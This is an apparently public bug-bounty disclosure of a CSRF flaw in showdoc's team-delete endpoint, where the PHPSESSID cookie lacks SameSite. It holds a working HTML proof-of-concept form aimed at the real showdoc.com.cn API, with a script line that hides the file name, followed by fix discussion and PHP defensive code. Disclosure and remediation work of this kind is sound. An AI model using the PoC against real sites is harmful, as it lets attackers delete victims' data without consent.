Cross-Site Request Forgery (CSRF) in star7th/showdoc
Nov 21st 2021
You set the strict flag only for one of your cookies, named cookie_token, but in Team management an attacker can still delete or add teams through the CSRF vulnerability, as the cookie named PHPSESSID doesn't have it.
Proof of Concept

1. … 38046 with the …
2. Open poc.html and click on the submit button.
3. After that, the team with id 38046 (or the team id you replaced it with) will be deleted.

```html
<html>
  <body>
    <!-- hide the PoC file name in the address bar -->
    <script>history.pushState('', '', '/')</script>
    <!-- cross-site POST to the team-delete endpoint; the browser attaches
         PHPSESSID because that cookie carries no SameSite attribute -->
    <form action="https://www.showdoc.com.cn/server/index.php?s=/api/team/delete" method="POST">
      <input type="hidden" name="id" value="38046" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
I should fix it. You can test it.
Not fixed, and just like before (I logged out of the system and logged in again).
This is a fix commit that has a good fix for strict cookies:
@amammad 👋 it looks like a bug on our side caused the disclosure bounty to be set to $155. We have reset it to the value displayed at disclosure ($64). Apologies for the confusion or inconvenience.
@amammad You can close the browser and open it again. Because the previous phpsessid was automatically maintained by the program, you need to restart the browser to invalidate it. If you log in again, the phpsessid is not regenerated.
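The PHP below is an added example, not code from showdoc or from the fix commit mentioned above. It shows one way to address both points raised in this thread: giving the PHPSESSID session cookie the same SameSite=Strict (plus Secure and HttpOnly) attributes that cookie_token already has, regenerating the session ID at login so the old PHPSESSID value does not survive a logout/login cycle, and requiring a per-session CSRF token on the api/team/delete endpoint as a second layer. Only the endpoint and cookie names come from the report; the function names, the delete_team_owned_by() helper and the handler structure are assumptions.

```php
<?php
// Added example (not showdoc's code). Cookie and endpoint names follow the
// report; function names and delete_team_owned_by() are hypothetical.

declare(strict_types=1);

// 1. Put SameSite (and Secure/HttpOnly) on the session cookie itself, not only
//    on cookie_token. Must run before session_start(); array form needs PHP >= 7.3.
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'domain'   => '',
    'secure'   => true,
    'httponly' => true,
    'samesite' => 'Strict',
]);
session_start();

// Same attributes for the application token cookie, so no cookie is the weak link.
function secure_cookie_options(int $expires = 0): array
{
    return [
        'expires'  => $expires,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Strict',
    ];
}

// 2. Issue a fresh session ID whenever privilege changes (login) and discard the
//    old one. Without this the PHPSESSID value is kept across logout/login,
//    which is what the maintainer observed above.
function login_user(int $userId): void
{
    session_regenerate_id(true);          // new ID; old session data deleted
    $_SESSION['uid']        = $userId;
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    setcookie('cookie_token', bin2hex(random_bytes(32)), secure_cookie_options());
}

function logout_user(): void
{
    $_SESSION = [];
    // Expire both cookies in the browser as well as destroying server-side state.
    setcookie(session_name(), '', secure_cookie_options(time() - 3600));
    setcookie('cookie_token', '', secure_cookie_options(time() - 3600));
    session_destroy();
}

// 3. Defence in depth: do not rely on the cookie attribute alone. A state-changing
//    endpoint must also require a per-session token that a cross-site form cannot know.
function require_csrf_token(): void
{
    $sent     = $_POST['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    // is_string() guards against csrf_token[]=... which would make hash_equals() throw.
    if ($expected === '' || !is_string($sent) || !hash_equals($expected, $sent)) {
        http_response_code(403);
        exit('invalid CSRF token');
    }
}

// Hypothetical handler for the endpoint used in the PoC (s=/api/team/delete).
function handle_team_delete(): void
{
    if (($_SERVER['REQUEST_METHOD'] ?? '') !== 'POST' || empty($_SESSION['uid'])) {
        http_response_code(403);
        exit('forbidden');
    }
    require_csrf_token();

    $teamId = filter_input(INPUT_POST, 'id', FILTER_VALIDATE_INT);
    if ($teamId === false || $teamId === null) {
        http_response_code(400);
        exit('bad team id');
    }
    // Hypothetical model call: deletes the team only if the current user owns it.
    delete_team_owned_by((int) $_SESSION['uid'], $teamId);
    header('Content-Type: application/json');
    echo json_encode(['deleted' => $teamId]);
}
```

Two caveats worth keeping in mind: SameSite=Strict also withholds the session cookie on ordinary top-level navigations into the site (a link from an e-mail lands on a logged-out page), whereas Lax keeps those working while still blocking cross-site form POSTs, so choose the value deliberately and keep the token check either way. The array form of session_set_cookie_params() and setcookie() requires PHP 7.3 or later; older versions need the SameSite attribute appended to the cookie path as a workaround.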
CVE published! 🎊